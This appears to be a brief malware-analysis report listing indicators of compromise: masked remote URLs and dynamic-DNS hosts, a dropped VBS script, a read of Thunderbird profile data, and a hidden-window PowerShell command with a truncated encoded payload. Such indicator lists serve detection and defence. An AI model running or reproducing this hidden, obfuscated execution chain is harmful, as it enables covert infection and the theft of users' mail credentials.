Technical Information
- http://lo###abayev.xyz/temur/ads.jpg
- %APPDATA%\thunderbird\profiles.ini
- %HOMEPATH%\comm100chats.vbs
- http://lo###abayev.xyz/temur/ads.jpg
- DNS ASK lo###abayev.xyz
- DNS ASK ex#####ro.freeddns.org
- '<SYSTEM32>\wscript.exe' "%HOMEPATH%\Comm100Chats.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -noexit -enc JgAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQALgBJAG4AdgBvAGsAZQBDAG8AbQBtAGEAbgBkAC4AKAAoACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuAEkAbgB2AG8AawBlAEMAbwBtAG0AYQ...' (with hidden window)